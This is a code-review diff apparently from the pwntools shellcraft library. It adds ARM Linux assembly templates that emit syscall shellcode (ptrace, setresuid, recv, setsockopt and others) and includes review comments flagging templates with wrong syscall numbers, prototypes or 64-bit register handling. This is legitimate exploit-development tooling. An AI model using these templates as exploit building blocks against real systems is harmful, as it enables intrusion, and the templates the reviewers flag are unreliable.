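Review bot: `profil` is not a Linux system call at all — it is a libc function implemented on top of `setitimer`/`SIGPROF` — so there is no `__NR_profil` and `${syscall('SYS_profil', sample_buffer, size, offset, scale)}` cannot resolve its constant. This generated template should be removed rather than documented.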
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="request, vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/putpmsg.asm b/pwnlib/shellcraft/templates/arm/linux/putpmsg.asm new file mode 100644 index 000000000..d0a6bc062 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pwrite.asm b/pwnlib/shellcraft/templates/arm/linux/pwrite.asm new file mode 100644 index 000000000..ed5525a29 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/pwritev.asm b/pwnlib/shellcraft/templates/arm/linux/pwritev.asm new file mode 100644 index 000000000..dc85257dd --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/pwritev.asm 
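Review bot: `putpmsg` is one of the STREAMS calls Linux reserves a number for but never implemented (`sys_ni_syscall` where defined), and as far as I can tell the ARM syscall table does not list it at all, so `${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)}` will either fail to resolve or only return ENOSYS. Drop the template or add a docstring caveat such as `Not implemented by Linux; always returns -ENOSYS.`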
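Review bot: `pwrite` has the same 64-bit offset problem as `pread`: on 32-bit ARM EABI `pwrite64` takes its offset in the aligned pair r4:r5 with r3 as padding, so `${syscall('SYS_pwrite', fd, buf, n, offset)}` misplaces it and the kernel writes at an undefined offset. Also confirm that `SYS_pwrite` exists in the ARM constants (the kernel name is `pwrite64`); if the `syscall` helper does not split 64-bit values, document the limitation or take an explicit low/high pair.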
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/readahead.asm b/pwnlib/shellcraft/templates/arm/linux/readahead.asm new file mode 100644 index 000000000..98ff4ee8d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/arm/linux/readdir.asm b/pwnlib/shellcraft/templates/arm/linux/readdir.asm new file mode 100644 index 000000000..2041fed0e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/readlink.asm b/pwnlib/shellcraft/templates/arm/linux/readlink.asm new file mode 100644 index 000000000..370212a8d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} 
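Review bot: `readahead` takes a 64-bit `offset` (the docstring itself says `off64_t`) which on 32-bit ARM EABI is passed in an aligned register pair (r2:r3) with `count` following in r4, whereas `${syscall('SYS_readahead', fd, offset, count)}` puts the offset in r1 and the count in r2. Unless the `syscall` helper is 64-bit aware (not visible here), both arguments land in the wrong registers; document the limitation or pass the halves explicitly.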
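Review bot: The `readdir` template mirrors the libc prototype (`dirp(DIR)`), but that is not the kernel interface: the syscall is `old_readdir(fd, dirent, count)` with three arguments, and on ARM it is OABI-only (the EABI headers undefine `__NR_readdir`), so `${syscall('SYS_readdir', dirp)}` is wrong however the constant resolves. Prefer the `getdents` helper this commit adds, or if the legacy call is really wanted rewrite the page as `<%page args="fd, dirent, count"/>` with `${syscall('SYS_readdir', fd, dirent, count)}` and document the OABI restriction.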
diff --git a/pwnlib/shellcraft/templates/arm/linux/readlinkat.asm b/pwnlib/shellcraft/templates/arm/linux/readlinkat.asm new file mode 100644 index 000000000..503f2be1b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/readv.asm b/pwnlib/shellcraft/templates/arm/linux/readv.asm new file mode 100644 index 000000000..49f1cc4f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/arm/linux/recv.asm b/pwnlib/shellcraft/templates/arm/linux/recv.asm new file mode 100644 index 000000000..a47082e60 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/recvfrom.asm b/pwnlib/shellcraft/templates/arm/linux/recvfrom.asm new file mode 100644 index 000000000..9d1dee4ac --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/recvfrom.asm 
@@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/arm/linux/recvmmsg.asm new file mode 100644 index 000000000..c89894b92 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/arm/linux/recvmsg.asm b/pwnlib/shellcraft/templates/arm/linux/recvmsg.asm new file mode 100644 index 000000000..08a5d06cd --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/arm/linux/remap_file_pages.asm new file mode 100644 index 000000000..0ea82825c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/remap_file_pages.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/rename.asm b/pwnlib/shellcraft/templates/arm/linux/rename.asm new file mode 100644 index 000000000..0415d2085 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/arm/linux/renameat.asm b/pwnlib/shellcraft/templates/arm/linux/renameat.asm new file mode 100644 index 000000000..c9f39e916 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/arm/linux/rmdir.asm b/pwnlib/shellcraft/templates/arm/linux/rmdir.asm new file mode 100644 index 000000000..aec43b858 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..2ac397988 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..9b33b2732 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/arm/linux/sched_getaffinity.asm new file mode 100644 index 000000000..5a8d462b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/arm/linux/sched_getparam.asm new file mode 100644 index 000000000..5abe46e9b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/arm/linux/sched_getscheduler.asm new file mode 100644 index 000000000..1acf2ae55 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/arm/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..01a5abfc5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/arm/linux/sched_setaffinity.asm new file mode 100644 index 000000000..5eacbfac9 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_setaffinity.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/arm/linux/sched_setparam.asm new file mode 100644 index 000000000..5e445dff4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/arm/linux/sched_setscheduler.asm new file mode 100644 index 000000000..1969db5f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_yield.asm b/pwnlib/shellcraft/templates/arm/linux/sched_yield.asm new file mode 100644 index 000000000..44c5ccfcd --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_yield.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/arm/linux/select.asm b/pwnlib/shellcraft/templates/arm/linux/select.asm new file mode 100644 index 000000000..8c15aed68 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sendfile.asm b/pwnlib/shellcraft/templates/arm/linux/sendfile.asm new file mode 100644 index 000000000..fce854db1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sendfile64.asm b/pwnlib/shellcraft/templates/arm/linux/sendfile64.asm new file mode 100644 index 000000000..686b14f87 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sendfile64.asm 
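Review bot: `${syscall('SYS_select', ...)}` in the select template targets the obsolete old-ABI select number, which as far as I recall the kernel's arch/arm unistd.h `#undef`s for EABI userspace and routes to `sys_ni_syscall` unless the kernel was built with OABI compat, so the generated shellcode would return ENOSYS on a typical modern ARM target; glibc issues `_newselect` instead. Either emit `SYS__newselect` here (same five-argument layout) or add a caveat to the docstring, e.g. `NOTE: on EABI kernels without OABI_COMPAT this syscall is not wired up; prefer _newselect.` The same applies to the other OABI-only numbers this batch generates templates for (time, stime). If the templates are produced by a generator, filtering its syscall list against the ARM EABI table would avoid shipping dead entries.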
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setdomainname.asm b/pwnlib/shellcraft/templates/arm/linux/setdomainname.asm new file mode 100644 index 000000000..dc56d412e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setgid.asm b/pwnlib/shellcraft/templates/arm/linux/setgid.asm new file mode 100644 index 000000000..157017d8f --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setgroups.asm b/pwnlib/shellcraft/templates/arm/linux/setgroups.asm new file mode 100644 index 000000000..8494c9069 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/sethostname.asm b/pwnlib/shellcraft/templates/arm/linux/sethostname.asm new file mode 100644 index 000000000..7be4c893d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setitimer.asm b/pwnlib/shellcraft/templates/arm/linux/setitimer.asm new file mode 100644 index 000000000..b4869a291 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setpgid.asm b/pwnlib/shellcraft/templates/arm/linux/setpgid.asm new file mode 100644 index 000000000..c105c3aa5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setpriority.asm b/pwnlib/shellcraft/templates/arm/linux/setpriority.asm new file mode 100644 index 000000000..4319b0955 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setpriority.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setregid.asm b/pwnlib/shellcraft/templates/arm/linux/setregid.asm new file mode 100644 index 000000000..57d3145e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setregid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setresgid.asm b/pwnlib/shellcraft/templates/arm/linux/setresgid.asm new file mode 100644 index 000000000..f13673ba4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setresuid.asm b/pwnlib/shellcraft/templates/arm/linux/setresuid.asm new file mode 100644 index 000000000..c95e60339 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setresuid.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setreuid.asm b/pwnlib/shellcraft/templates/arm/linux/setreuid.asm new file mode 100644 index 000000000..7634ad1fe --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setreuid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setrlimit.asm b/pwnlib/shellcraft/templates/arm/linux/setrlimit.asm new file mode 100644 index 000000000..ad787f7f2 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setsid.asm b/pwnlib/shellcraft/templates/arm/linux/setsid.asm new file mode 100644 index 000000000..4e9c6bb16 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/setsockopt.asm b/pwnlib/shellcraft/templates/arm/linux/setsockopt.asm new file mode 100644 index 000000000..0ff71bb0b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setsockopt.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall + from pwnlib.shellcraft.arm import push +%> +<%page args="sockfd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall setsockopt. See 'man 2 setsockopt' for more information. + +Arguments: + sockfd(int): sockfd + level(int): level + optname(int): optname + optval(void): optval + optlen(int): optlen + + ${syscall('SYS_setsockopt', sockfd, level, optname, optval, optlen)} + diff --git a/pwnlib/shellcraft/templates/arm/linux/setsockopt_timeout.asm b/pwnlib/shellcraft/templates/arm/linux/setsockopt_timeout.asm new file mode 100644 index 000000000..3c56a209c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setsockopt_timeout.asm @@ -0,0 +1,21 @@ + +<% + from pwnlib.shellcraft.arm.linux import setsockopt + from pwnlib.shellcraft.arm import push + from pwnlib.shellcraft.arm import mov + from pwnlib.constants import SOL_SOCKET, SO_RCVTIMEO +%> +<%page args="sock, secs"/> +<%docstring> +Invokes the syscall for setsockopt with specified timeout. See 'man 2 setsockopt' for more information. + +Arguments: + sock(int): sock + secs(int): secs + + eor r4, r4, r4 + push {r4} + ${mov('r4', secs)} + push {r4} + ${setsockopt(sock, 'SOL_SOCKET', 'SO_RCVTIMEO', 'sp', 8)} + diff --git a/pwnlib/shellcraft/templates/arm/linux/settimeofday.asm b/pwnlib/shellcraft/templates/arm/linux/settimeofday.asm new file mode 100644 index 000000000..4fa21562e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/settimeofday.asm 
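Review bot: The two `push {r4}` instructions in setsockopt_timeout build a `struct timeval` in place and then hand `sp` to setsockopt as optval, but nothing says so, and the reader has to reverse the push order to see that `tv_sec = secs` lands at `[sp]` and `tv_usec = 0` at `[sp+4]`; add a comment above the first push such as `/* build struct timeval { tv_sec = secs, tv_usec = 0 } on the stack; sp points at it and the 8 bytes are never popped */`. The `from pwnlib.shellcraft.arm import push` and `from pwnlib.constants import SOL_SOCKET, SO_RCVTIMEO` imports are dead: the template uses raw `push {r4}` and passes the constants as the strings `'SOL_SOCKET'`/`'SO_RCVTIMEO'`. `eor r4, r4, r4` / `mov r4, secs` clobber r4 without saving it, which is normal for shellcode but worth a word in the docstring since the plain setsockopt template only touches the syscall-ABI registers.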
